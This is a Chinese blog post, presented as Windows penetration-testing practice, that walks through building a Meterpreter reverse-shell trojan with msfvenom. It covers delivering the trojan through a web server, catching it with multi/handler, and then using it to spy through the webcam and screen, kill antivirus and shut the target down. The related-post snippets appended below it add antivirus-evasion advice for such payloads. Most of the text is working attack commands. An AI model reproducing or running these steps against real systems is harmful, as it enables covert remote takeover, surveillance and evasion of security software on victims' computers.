msfvenom生成后台木马监听目标(windows渗透测试)

最新推荐文章于 2024-05-29 09:33:01 发布
原创 最新推荐文章于 2024-05-29 09:33:01 发布 · 8.6k 阅读 · 39 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #渗透测试 #服务器

针对windows操作系统的渗透测试

操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。

实战:

一:后台木马生成

注意在代码中LHOST:172.16.5.2与LPORT:4444  要根据实际情况来更改

LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.5.2 LPORT=4444 -f exe -o /root/shell.exe   //生成一个名为shell的木马

二:将木马移动到目标桌面

在root目录下找到我们生成的木马shell.exe然后将木马传到目标桌面

两种方法:

1.开启apache将木马上传到网页上,然后windows以访问网页的形式下载木马

service apache2 restart   //重启apache服务

访问渗透机出现以下后面就成功了,如果没有就说明没有安装apache服务

将木马文件移动到/var/www/html/目录下

重启apapche服务再次访问网页就出来了,然后下载木马文件到桌面就可以了

2.在虚拟机里安装VMware tools直接就可以把木马从kail桌面拖到windows桌面

三:运行exploit/multi/handler模块

启动msf

use exploit/multi/handler   //使用模块
set payloads windows/meterpreter/reverset_tcp    //设置payload
set LHOST 172.16.5.2    //设置172.16.5.2进行监听 
set LPORT 4444    //监听端口为4444

双击打开windows桌面上的木马就可以进入后渗透

 最后输入screenshare可以对目标进行实时监控

分享几个后渗透命令:

webcam_list        查看摄像头

webcam_snap        通过摄像头拍照

webcam_stream        通过摄像头开启视频

screenshot        获取屏幕截图

screenshare        实时监控桌面

shutdown        关闭目标机器

run getgui-e        启动目标远程桌面

sysinfo        查看目标系统信息

run killav        关闭目标杀毒软件

getuid        查看当前用户权限

getwd        查看目录

陳小陌
关注
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5424
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
msf017-010复现及木马利用
qq_56895581的博客
01-17 1661
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。被袭击的设备被锁定,并索要300比特币赎金。
msf常用模块功能整理
m0_55306747的博客
07-21 6170
整理一下msf的常用模块和功能
kali msfvenom生成木马
qq_33391644的博客
02-06 6571
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。 这里就只是记录下生成一个程序的过程。 msfvenom msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.首先还是得打开postgresqlro...
c语言编木马程序,【C语言】后台木马程序
weixin_35799770的博客
05-17 235
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6974
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4987
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2980
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;
最新发布
10-24
首先,用户的问题是:“我想查找利用Msfvenom生成木马、进行免杀处理以及利用msfconsole进行监听的方法”。用户提供了几个引用,这些引用是关于使用Msfvenom生成木马、免杀处理和监听的方法。 关键点: - 用户需要...
msf生成木马监听windows
11-10
对于生成Windows木马并设置监听,你可以按照以下步骤操作: 1. **安装Metasploit**: 首先,你需要安装Metasploit框架。可以在其官方网站上下载适用于Windows的版本,并按照文档安装。 2. **选择payloads**: 使用...
Msfvenom建立后门程序指令及开启监听
热门推荐
Dreamsi_zhang的博客
08-13 1万+
一、场景介绍
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
weixin_51803729的博客
02-11 7837
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
c语言木马简单,【C语言】后台木马程序
weixin_33054847的博客
05-19 304
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
msfvenom介绍
weixin_46483815的博客
05-11 3301
主要介绍msfvenom 和一些实验
怎样实现后台木马
下下签的专栏--璇玑玉衡
04-13 3807
        以前一直觉得像灰鸽子、黑洞之类的木马很神秘,很厉害。自己也想学学,刚好前段时间我一个导师布置了个课题研究木马防范技术。当然要防住木马这种东西总得了解别人的原理吧,无奈之中只好自己写个木马了。        若干日后。。。。。        其实木马这东西还真他#$简单,说穿了就是一个底层的TCP/IP通信而已。所谓木马的好坏,不外乎是指谁的隐藏做的好,谁实现的功能多少而已。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 5536
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msf_木马
jinhezhai的博客
05-13 2414
使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机 1.制作木马 打开kali虚拟机 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe 使用msfvenom生成木马, 在渗透过程中,MSF漏洞利用
使用msf监听模块接收反弹shell
-
05-23 3927
msf
msfvenom设置完成 链接显示失败 如何解决
09-04
<think> 嗯,用户遇到了msfvenom生成后门后连接失败的问题,这在实际渗透测试中很常见。从用户引用的资料来看,ta已经掌握了基础payload生成命令,但可能忽略了环境配置的细节问题。 用户提供的引用[1][2]展示了两种reverse_tcp payload的生成方式,引用[3][4]则暗示ta可能在尝试权限提升或内核级操作。不过当前问题更偏向网络层基础故障排查。 连接失败的常见原因其实有迹可循:防火墙拦截是最可能的(尤其是windows defender没关的情况下),其次是地址/NAT问题。想起之前有个案例,学生在虚拟机里用192.168.x.x生成payload,但物理机实际用的是172网段,这种低级错误反而容易被忽视。 网络配置方面需要重点排查:LHOST必须设为监听主机的真实IP(ifconfig可查),如果攻击机在NAT后就需要端口转发。特别要注意的是,某些云主机的弹性IP需要额外配置安全组规则。 payload特性也不能忽略:x86和x64的系统架构差异会导致连接失败,32位payload在64位系统虽然能运行但稳定性差。另外meterpreter的stage传输可能被现代EDR阻断,引用[4]提到的TDI方式反而更隐蔽。 最后想到个易错点:用户可能在生成payload后忘记启动handler,或者handler配置与payload参数不一致(比如忘记改监听端口)。建议用户养成先生成payload再复制监听命令的习惯,避免手误。 </think> 好的,遇到`msfvenom`生成的后门连接失败是一个常见问题。这通常涉及到多个环节的配置或环境问题。请按照以下步骤逐步排查和解决: ### 🔍 1. 检查基础网络连通性 (最基础和关键) * **目标主机 ➡️ 攻击主机 (LHOST) 的连通性:** 确保目标机器能访问到你设置的 `LHOST` IP (`192.168.30.129` 或 `172.22.25.51`)。在目标机器上尝试: * Ping: `ping 192.168.30.129` (如果禁ping可能不成功,但尝试总没错)。 * Telnet/Test-NetConnection: `telnet 192.168.30.129 4455` (Windows) 或 `Test-NetConnection -ComputerName 192.168.30.129 -Port 4455` (PowerShell)。Linux/Mac 用 `nc -zv 192.168.30.129 4455`。 * **结果:** * **失败❌:** 网络不通。检查: * 📡 攻击机和目标是否在同一局域网?不同局域网需端口转发/NAT配置。 * 🌐 IP 地址是否正确?特别是攻击机是否使用了 VMnet/NAT/Bridged 的正确 IP?**建议使用 `ifconfig` (Linux/Mac) 或 `ipconfig` (Windows) 在攻击机上确认当前用于通信的 IP**。 * 🧱 防火墙是否拦截?**临时关闭攻击机和目标机上的防火墙测试**。特别注意目标机上的 Windows Defender 防火墙或第三方杀软。 * 🔌 VLAN/路由是否允许流量通过? * **端口是否可用?** 确保 `LPORT` (如 `4455`) 在攻击机上没有被其他程序占用。在攻击机上执行: * Linux: `netstat -tulnp | grep 4455` * Windows: `netstat -ano | findstr :4455` * 如果被占用,更换一个不常用的端口 (如 `4444`, `5555`, `8080`) 重新生成 payload 和启动 handler。 ### 2. 确认 MSF Handler 配置正确 * **启动 Handler 了吗?** 在攻击端的 Metasploit (`msfconsole` 内) 是否设置了对应的 `exploit/multi/handler` 模块并正确配置了参数? ```bash use exploit/multi/handler set payload windows/meterpreter/reverse_tcp # 必须与你生成的payload类型严格一致! set LHOST 192.168.30.129 # 必须与你生成payload时的LHOST一致! set LPORT 4455 # 必须与你生成payload时的LPORT一致! run -j # 或 exploit -j ``` * **Payload 类型匹配吗?** 这是最常见错误之一!`set payload` 命令设置的 payload 类型 **必须** 与 `msfvenom` 生成时使用的 `-p` 参数指定的 payload (`windows/meterpreter/reverse_tcp`) **完全一致**。大小写敏感! * **LHOST/LPORT 一致吗?** Handler 设置的 `LHOST` 和 `LPORT` 必须与你 `msfvenom` 命令中的 `LHOST` 和 `LPORT` **一字不差**。 * **Payload 生成后再启动 Handler?** 确保在目标机器上执行你的 payload (`shell.exe`) **之前**,攻击端的 handler 已经启动 (`run` 或 `exploit`) 并在监听状态。 ### 3. 检查 Payload 兼容性与规避 * **架构是否匹配?** 目标系统是 32 位 (x86) 还是 64 位 (x64)?虽然 `windows/meterpreter/reverse_tcp` 在 64 位系统上也能运行,但有时需要明确指定 `windows/x64/meterpreter/reverse_tcp` 以获得更好的兼容性和稳定性。 * **杀毒软件/EDR 拦截了吗?** 这是导致连接失败或 payload 无法执行的最主要原因之一。尝试: * **使用编码器 (`-e`):** 如引用 [2] 所示 (`-e x86/shikata_ga_nai -i 3`),增加混淆轮数 `-i`。但现代 AV 对常见编码器检测很强。 * **使用不同模板 (`-x`):** 捆绑一个合法程序 (如 `calc.exe`) 增加免杀率:`msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=... -x /path/to/calc.exe -f exe -o shell.exe`。 * **尝试不同 Payload 类型:** 普通 `reverse_tcp` 容易被检测,尝试: * `reverse_http(s)`: 流量走 HTTP(S) 协议,更隐蔽:`-p windows/meterpreter/reverse_http LHOST=... LPORT=80` (或 `reverse_https`, LPORT 通常设为 443)。 * `reverse_tcp_rc4/dns`等: 可能有不同规避效果。 * **使用更高级的规避技术:** 如自定义加密、分阶段传输、内存注入等。这需要更深入的研究。 * **Payload 是否正确传输并在目标执行?** * Payload 文件 (`shell.exe`) 是否成功上传/下载到目标机? * 在目标机上双击执行后,是否有错误提示?(表明 payload 本身运行失败) * Windows Defender/SmartScreen 是否拦截了执行?检查安全中心日志。 ### 🌐 4. 复杂网络环境问题 (NAT/端口转发/云环境) * **攻击机在 NAT 后 (如家用路由器后/虚拟机 NAT 模式):** * `LHOST` **必须** 设置为攻击机在局域网内的真实 IP (如 `192.168.1.x`),而不是公网 IP 或 `127.0.0.1`。 * 在路由器上设置**端口转发 (Port Forwarding)**:将公网 IP 的 `LPORT` (如 `4455`) 转发到攻击机内网 IP 的 `LPORT` (`4455`)。 * 在 `msfconsole` handler 中,`LHOST` 仍然设置为攻击机**内网 IP**。 * **攻击机在云服务器 (AWS, Azure, GCP 等):** * `LHOST` 设置为云服务器的**公网 IP 地址**或**弹性 IP**。 * **至关重要⚠️:** 在云服务商的安全组 (Security Group) / 防火墙规则中,**允许入站流量 (Inbound)** 访问你的 `LPORT` (如 `4455` TCP)!这是云环境最常见的问题。 * **目标机在 NAT 后/防火墙严格出站:** 目标机的防火墙可能阻止了到攻击机 `LHOST:LPORT` 的出站连接。尝试常见允许端口 (80, 443) 的 payload (`reverse_http/s`)。 ### 📜 5. 检查引用 [3] 和 [4] 的适用性 - 权限与执行环境 * **Payload 执行需要权限吗?** 引用 `[3]` 提到的 `AlwaysInstallElevated` 是一种滥用 MSI 文件获取 SYSTEM 权限的方法。如果你的 payload 需要管理员/SYSTEM 权限才能正常运行或建立连接 (例如需要访问某些受保护资源),而当前用户权限不够,可能会导致连接失败。尝试: * 以管理员权限运行你的 `shell.exe` (右键 > 以管理员身份运行)。 * 如果目标是提权,寻找其他提权方法运行 payload。 * **内核级 Payload?** 引用 `[4]` 描述了一种更底层的连接方式 (`TDI` 内核驱动)。标准 `msfvenom` 生成的 `reverse_tcp` 是用户态 payload。如果你尝试模拟引用 `[4]` 的行为,需要极其复杂的自定义内核驱动 payload,远超 `msfvenom` 能力范围。确认你使用的就是普通的 `meterpreter/reverse_tcp`。 ### 📌 总结排查流程建议 1. **网络第一:** 用 `ping`/`telnet`/`nc` 确保目标机到攻击机 `LHOST:LPORT` TCP 连通。 2. **Handler 配置:** 反复确认 `msfconsole` 中 handler 的 `payload`, `LHOST`, `LPORT` 与 `msfvenom` **精确一致**,并在 payload 执行前启动。 3. **防火墙关闭测试:** **临时关闭**攻击端和目标端所有防火墙/杀软测试。 4. **免杀尝试:** 更换 payload 类型为 `reverse_http(s)` (端口 80/443)、使用编码器 `-e`、捆绑程序 `-x`。 5. **环境适配:** 确认目标架构 (32/64位),payload 是否成功执行。 6. **网络拓扑适配:** 如果是 NAT/云环境,配置好端口转发和安全组规则。 7. **权限检查:** 尝试管理员权限运行 payload。 --- ### 📚 相关问题 1. 如何利用 `reverse_http(s)` payload 提升绕过防火墙的成功率?它与 `reverse_tcp` 在流量特征上有何本质区别?[^1][^2] 2. 除了 `msfvenom` 自带的编码器,有哪些更有效的现代 payload 混淆和免杀技术?[^2] 3. 在云服务器 (AWS/Azure) 上搭建 Metasploit 监听(`handler`) 需要特别注意哪些安全组和网络配置?[^网络经验] 4. 如何使用 Metasploit 的 `reverse_tcp` payload 配合 `Ngrok` 等内网穿透工具解决攻击端没有公网 IP 的问题?[^网络经验] 5. 如果怀疑 payload 被目标主机上的杀毒软件 (EDR) 拦截,除了更换 payload 类型,Metasploit 还有哪些内置模块或技巧可以用来协助进行免杀测试?[^2][^4] 6. 引用 `[3]` 中提到的 `AlwaysInstallElevated` 注册表项,如何利用它来部署并执行需要一个高权限才能成功连接回 Metasploit 的 payload?[^3] [^1]: 引用用户提供的 `msfvenom reverse_tcp` 生成命令示例。 [^2]: 引用用户提供的 `msfvenom` 使用编码器和生成 payload 的示例。 [^3]: 引用用户提供的关于 `AlwaysInstallElevated` 注册表设置的信息。 [^4]: 引用用户提供的关于内核级 TDI 通信和 shellcode 下载的信息。 [^网络经验]: 基于常见的网络渗透测试经验。
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值